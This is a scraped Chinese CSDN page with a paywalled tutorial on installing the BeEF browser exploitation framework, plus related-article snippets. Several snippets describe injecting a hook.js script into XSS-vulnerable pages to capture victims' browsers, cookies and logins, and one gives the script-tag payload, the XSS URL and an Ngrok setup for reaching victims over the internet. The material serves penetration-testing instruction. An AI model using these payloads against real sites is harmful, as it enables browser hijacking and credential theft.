BEEF的搭建与使用

最新推荐文章于 2025-04-21 15:53:55 发布

wangyi_lin

最新推荐文章于 2025-04-21 15:53:55 发布

阅读量1.6w

点赞数

CC 4.0 BY-SA版权

分类专栏：平台以及开源代码研究

本文链接：https://blog.youkuaiyun.com/wangyi_lin/article/details/9346317

安装与搭建

beef是ruby写的，在windows下安装beef还是有些麻烦的，需要装很多东西。

源码在github googlecode等地方均有下载

http://code.google.com/p/beef/downloads/list
https://github.com/beefproject/beef

在windows下配置ruby，推荐大家使用railsinstaller这个东西，各种环境一键安装，提醒一下这里ruby要求1.9以及以上版本。

http://railsinstaller.org/

另外还需要SQLite.dll这个下载之后放到ruby的bin目录下

http://www.sqlite.org/download.html

之后只要跑到源代码目录下，运行

bundle install
ruby beef

出现这种东西说明成功了，端口以及各种配置在config.yaml中配置

C:\beef\beef-master>ruby beef
[16:06:09][*] Bind socket [imapeudora1] listening on [0.0.0.0:2000].
[16:06:09][*] Browser Exploitation Framework (BeEF) 0.4.4.7-alpha
[16:06:09]    |   Twit: @b

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

wangyi_lin

关注关注

0
点赞
踩
14

收藏

觉得还不错? 一键收藏
3
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

【渗透测试工具beef】XSS渗透测试工具beef如何安装使用？

03-02

570

目录事情是这样的 beef介绍 beef工作原理简介 kali下使用beef beef配置IP地址及默认密码使用beef攻击流程启动beef 通过web端访问 1、输入config.xml中配置的用户名和密码，登录beef管理台 2、在网站中植入hook.js代码 3、客户端192.168.107.110，访问这个页面，就会被beef勾住，浏览器的大量信息就被beef获取到了 4、获取浏览器cookie 5、网页重定向,目标浏览器跳转到你指定的网页 6、登录弹窗，获取用户名和密码模块颜色及解释回顾

利用BeEF执行XSS攻击

m0_70185580的博客

05-31

766

XSS攻击（Cross-Site Scripting）是指攻击者在网页中注入恶意脚本代码，使受害者在浏览器中运行该脚本，从而达到攻击目的。BeEF是一种利用浏览器漏洞的攻击工具，可以在浏览器端运行恶意脚本。当攻击成功后，可以在BeEF的控制面板中查看受害者的浏览器信息，并控制其浏览器。这段代码会将BeEF的hook.js文件注入到目标网站中，并启动BeEF的hook服务。接下来，需要获取要攻击的网站的URL。当受害者在浏览器中打开包含恶意脚本的页面时，BeEF就会启动并开始执行攻击。

3 条评论您还未登录，请先登录后发表或查看评论

beef-installer:用于发行版和Termux的BeEF安装程序！

04-17

牛肉安装机该脚本可自动从GitHub安装BeEF（浏览器利用框架）。要使用它以root身份运行：（为了）： git clone https://github.com/tony23x/beef-install.git cd beef-installer;ls bash install.sh python3 beef-installer.py 准备好了！如果是disro，则牛肉目录将位于环境变量$ HOME中，位于termux中的$ PREFIX / opt中 Kali Linux（PC，Userland） Kali Nethunter无根 Termux 预览： Termux

beef安装

2403_82795493的博客

04-29

575

长度被限制了，做一个简单的xss绕过，检测源码，把maxlength改为100就行。把短链接发送给靶机访问（靶机访问就会受到xss攻击）利用生成的链接插入到，存在xss漏洞的地方。打开皮卡丘靶场，将payload插入到里面。第一次会提示让你输入新密码，用于一会登录。攻击机IP：192.168.0.105。本机IP：192.168.0.5。在登录beef，查看信息。把生成的新链接复制下来。启动beef-xss。

Docker安装beef-xss

最新发布

wangzhemvp的博客

04-21

511

新版的kali系统中安装了beef-xss会因为环境问题而无法启动，可以使用Docker来安装beef-xss，节省很多时间。

【beef工具-01】神器beef的安装与简介

m0_64378913的博客

06-01

8132

目录1 beef概述1 beef简介1.2 beef2 beef安装3 beef的重要网址4 简单测试5 总结参考文章 1 beef概述 1 beef简介 BeEF 是浏览器开发框架的缩写。它是一款专注于网络浏览器的渗透测试工具。随着人们越来越担心针对客户端（包括移动客户端）的网络攻击，BeEF 允许专业的渗透测试人员通过使用客户端攻击向量来评估目标环境的实际安全状况。与其他安全框架不同，BeEF 超越了加固的网络边界和客户端系统，并在一扇敞开的门的上下文中检查可利用性：Web 浏览器。

初探BeEF

weixin_30258901的博客

01-23

341

1.什么是BeEF？就是The Browser Exploitation Framework 的缩写，意在通过一些手段，控制对方的浏览器。里面集成了很多模块，能够获取很多东西，有cookie，浏览器名字，版本，插件，是否支持java，vb，flash等，所以说XSS神器嘛。。大概长这个样子（默认用户名密码是beef，beef）： 2.安装beef和使用beef BT5...

linux安装BEEF

weixin_72453966的博客

03-26

176

BeEF（The Browser Exploitation Framework）是一款强大的浏览器渗透测试框架，主要用于对浏览器进行安全评估和攻击。通过控制受害者的浏览器，渗透测试人员可以执行多种攻击技术，如窃取信息、执行恶意代码等。BeEF 的目标是揭示现代浏览器的安全风险，并为安全研究人员提供一个强大的测试平台。跨平台支持：兼容多种操作系统，如 Windows、Linux、macOS。多种攻击模块：提供多种预定义的攻击模块，方便快速测试。实时控制：通过实时控制面板监控和操作受害者的浏览器。

云服务器上搭建beef-xss

03-11

8. 测试和使用：使用Web浏览器访问云服务器的IP地址和端口号，进入beef-xss的管理界面，开始进行漏洞测试和XSS攻击。请注意，在进行任何安全测试和攻击活动之前，确保你已经获得了合法的授权，并且遵守法律和道德...

BEFF安装与配置

Kali与编程

12-19

1546

BeEF是一款功能强大的浏览器利用框架，对于渗透测试人员和安全研究人员来说，是一种有用的工具，可以帮助他们评估和加固浏览器的安全性。重要的是，在使用BeEF进行渗透测试时，要遵守法律和道德规范，并且只在合法授权的情况下使用该工具。选择适合自己的方式安装Kali Linux，配置好网络设置，并熟悉和掌握常用的渗透测试工具，这样就能够在Kali Linux环境中进行有效的渗透测试和安全审计工作。请记住，BeEF是一种强大的工具，应在合法的道德框架内使用，并遵循适用的法律和规定。

kali上安装beef

weixin_45873667的博客

04-27

563

前言： BeEF，全称The Browser Exploitation Framework，是一款针对浏览器的渗透测试工具安装BeEF步骤打开kali sudo apt-get install beef-xss 输入beef-xss启动beef，输入用户名和密码，（默认都是admin）接着输入beef-xss启动 ...

docker-beef:BeEF（浏览器开发框架）构建的 Dockerfile

06-20

码头牛肉 BeEF 的 Dockerfile（浏览器开发框架）拉取存储库docker pull malwarelu/beef 启动 BeEF docker docker run malwarelu/beef 正在运行的容器上的 TCP/3000 上可用的服务

Beef的安装及基本使用

weixin_50341025的博客

04-15

2779

安装beef apt-get update apt-get install beef-xss 配置密码 /etc/beef-xss/config.yaml 默认用户名beef 修改用户名或者密码，注意用户名不需要符号括起来，密码则需要双引号括起来启动服务 beef-xss 启动后会看见一些生成好的连接 [] Web UI: http://127.0.0.1:3000/ui/panel 管理页面 [] Hook: 样例地址登录beef控制平台将代码插入到目标URL，并欺骗被攻击

XSS框架之安装BEEF

3569

07-18

2745

这次部署邮件服务器大致分为3个步骤 » 安装GEM » 安装配置BEEF » 测试 » 安装GEM 步骤 1 » 安装rvm。 wget -O 123 https://raw.githubusercontent.com/wayneeseguin/rvm/master/binscripts/rvm-installer chmod +x 123 ./123 安装环境需

beef安装具体过程

qq_35398399的博客

10-27

1879

新版kali的BeEF的安装使用root权限安装beef-xss安装apt --fix-broken install![在这里插入图片描述](https://img-blog.csdnimg.cn/20201027105521422.png#pic_center)安装beef-xss运行beef-xss登录beef网站进行具体操作使用root权限安装了一个月，一直没有办法安装上kali,终于有一天不知道是哪位锦鲤保佑，突然我就安装上了。再次分享给大家我的经验。 1.利用sudo su进入root权限安

世一之详细之安装kali安装beef

atm7758258的博客

04-26

1712

kali安装beef常见操作，帮助排坑

beef安装和密码修改

尘玥的故事

09-23

779

按esc后输入:wq!保存并退出配置文件。 beef beef-xss beef-xss-stop beef修改密码 beef安装 BEEF Beef 修改密码

kali,beef-xss安装及使用

m0_73581247的博客

06-22

2497

1.Beef工具 1.1 Beef工具介绍 Beef是日前最强大的浏览器开源渗透测试框架,通过X55漏洞配合JS脚本和 Metasploit进行渗透; Beef是基于Ruby语言编写的,并且支持图形化界面,操作简单。新版的kail已经不自带beef工具了，需要自己下载。并且目前只支持macos和Linux系统。1.2 Beef工具安装在安装beef工具之前建议更新一下源 apt-get update apt-get install beef-xss 时间比较久，可以去放松一会启

Centos7 Docker安装Beef(阿里云服务器)

sinat_61654365的博客

01-15

1763

2、映射到自己喜欢的端口，我就弄到2333吧。账号密码都是beef。

beef-xss详细使用教程

03-18

### BeEF XSS Framework 使用指南 #### 什么是BeEF？ BeEF（Browser Exploitation Framework）是一个用于浏览器渗透测试的工具框架。它允许安全研究人员分析和演示浏览器作为攻击媒介的风险。通过注入恶意JavaScript代码，BeEF可以控制受害者的浏览器会话，并执行多种攻击向量。 #### 安装BeEF 要安装BeEF，可以通过以下命令完成： ```bash git clone https://github.com/beefproject/beef.git cd beef bundle install ``` 运行BeEF服务时，使用如下命令： ```bash ruby beef.rb ``` 默认情况下，BeEF会在`http://localhost:3000/ui/panel`上启动管理界面，默认用户名和密码均为`beef`[^4]。 #### 配置BeEF Hook Script 为了利用BeEF的功能，需要将目标用户的浏览器连接到BeEF服务器。这通常通过在存在XSS漏洞的目标网站中嵌入`hook.js`脚本来实现。例如，在反射型或存储型XSS场景下，可以插入以下HTML代码片段： ```html <script src="http://<your_beef_server_ip>:3000/hook.js"></script> ``` 这里的`<your_beef_server_ip>`应替换为实际部署BeEF的IP地址。 #### 测试环境搭建假设已经有一个本地PHP文件`xss.php`，其中包含简单的反射型XSS漏洞。以下是可能的内容示例： ```php <?php echo $_GET['input']; ?> ``` 访问URL `http://127.0.0.1/engineer/xss.php?input=<script%20src="http://<your_beef_server_ip>:3000/hook.js"></script>` 将触发BeEF钩子脚本加载[^3]。 #### 利用BeEF进行渗透测试一旦受害者浏览了含有上述脚本的页面，他们的浏览器会被标记为“在线”，并显示在BeEF控制面板中的模块列表里。此时可以选择不同的攻击模块来评估潜在风险，比如收集系统信息、窃取Cookie或者模拟键盘输入等操作。 #### 跨网络使用BeEF (BeeF-Over-Wan) 对于希望在外网环境下开展测试的情况，推荐采用类似Ngrok这样的反向代理解决方案。具体做法涉及设置隧道并将外部流量导向内部BeEF实例。有关更详细的指导，请参阅专门文档[BeeF-Over-Wan](https://github.com/snoopysecurity/beef-over-wan)[^5]。 ---